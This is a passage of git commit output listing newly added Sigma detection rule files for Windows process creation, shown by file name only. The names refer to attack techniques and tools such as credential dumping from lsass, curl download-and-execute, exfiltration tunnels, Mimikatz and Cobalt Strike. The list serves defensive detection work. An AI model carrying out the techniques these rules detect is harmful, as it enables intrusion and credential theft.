tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_encode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_clip_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_del_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmdkey_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_control_panel_item.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csc_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csi_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csvde_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_local_file_read.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dirlister_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_driverquery_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_driverquery_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsim_remove.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_esentutl_params.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_esentutl_webcache.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_lnk.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_finger_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_git_susp_clone.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpresult_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gup_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_chm_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_certify.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_certipy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_covenant.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_createminidump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_dinjector.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_gmer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_hashcat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_hydra.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_impersonate.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_inveigh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_koadic.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_localpotato.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_pchunter.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_powertool.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_rubeus.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpview.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_uacme.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_wce.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_winpeas.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_winpwn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_xordump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_zipexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hostname_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hwp_exploits.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_icacls_deny.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ieexec_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_imewbdld_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_installutil_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_kd_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ldifde_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ldifde_file_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_cdb.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dnx.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dump64.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_extexport.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_format.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ftp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_jsc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_openwith.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pester.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_register_app.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_replace.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_setres.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_sftp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml create mode 100644 